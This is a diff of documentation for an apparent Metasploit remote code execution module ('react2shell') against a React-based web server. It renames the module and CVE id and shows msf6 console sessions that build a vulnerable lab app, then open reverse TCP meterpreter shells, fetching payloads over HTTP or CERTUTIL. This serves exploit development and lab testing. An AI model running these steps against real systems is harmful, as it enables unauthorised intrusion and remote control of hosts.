@@ -9,7 +9,7 @@ requests with "__proto__", "constructor", or "prototype" as module names.
99
1010### Linux
1111
12- 1 . Open ` data\exploits\react2shell_cve_2025_55182 ` directory
12+ 1 . Open ` data\exploits\react2shell_unauth_rce_cve_2025_55102 ` directory
13132 . Build
1414```
1515docker build -t react2shell .
@@ -22,7 +22,7 @@ docker run -p 3000:3000 react2shell
2222
2323### Windows
2424
25- 1 . Open ` data\exploits\react2shell_cve_2025_55182 ` directory
25+ 1 . Open ` data\exploits\react2shell_unauth_rce_cve_2025_55102 ` directory
26262 . Build the application
2727```
2828npm run build
@@ -38,17 +38,17 @@ npm start
3838### Linux
3939
4040```
41- msf6 > use multi/http/react2shell_cve_2025_55182
42- [*] No payload configured, defaulting to php /meterpreter/reverse_tcp
43- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set RHOSTS 172.17.0.1
41+ msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102
42+ [*] No payload configured, defaulting to cmd/linux/http/x64 /meterpreter/reverse_tcp
43+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set RHOSTS 172.17.0.1
4444RHOSTS => 172.17.0.1
45- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set RPORT 3000
45+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set RPORT 3000
4646RPORT => 3000
47- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set LPORT 6666
47+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set LPORT 6666
4848LPORT => 6666
49- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set FETCH_SRVPORT 8081
49+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set FETCH_SRVPORT 8081
5050FETCH_SRVPORT => 8081
51- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > run
51+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > run
5252[*] Started reverse TCP handler on 172.17.0.1:6666
5353[*] Running automatic check ("set AutoCheck false" to disable)
5454[+] The target appears to be vulnerable.
@@ -67,23 +67,23 @@ Meterpreter : x64/linux
6767### Windows
6868
6969```
70- msf6 > use multi/http/react2shell_cve_2025_55182_scanner
71- [*] No payload configured, defaulting to php /meterpreter/reverse_tcp
72- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set RHOSTS 192.168.19.137
70+ msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102_scanner
71+ [*] No payload configured, defaulting to cmd/linux/http/x64 /meterpreter/reverse_tcp
72+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set RHOSTS 192.168.19.137
7373RHOSTS => 192.168.19.137
74- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set RPORT 3000
74+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set RPORT 3000
7575RPORT => 3000
76- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set LPORT 6666
76+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set LPORT 6666
7777LPORT => 6666
78- msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8082
79- FETCH_SRVPORT => 8082
80- msf6 exploit(multi/http/react2shell_cve_2025_55182) > set target 1
78+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set target 1
8179target => 1
82- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
80+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
8381payload => cmd/windows/http/x64/meterpreter/reverse_tcp
84- msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_COMMAND CERTUTIL
82+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8082
83+ FETCH_SRVPORT => 8082
84+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_COMMAND CERTUTIL
8585FETCH_COMMAND => CERTUTIL
86- msf6 exploit(multi/http/react2shell_cve_2025_55182 ) > run
86+ msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102 ) > run
8787
8888[*] Started reverse TCP handler on 192.168.19.130:4444
8989[*] Running automatic check ("set AutoCheck false" to disable)
0 commit comments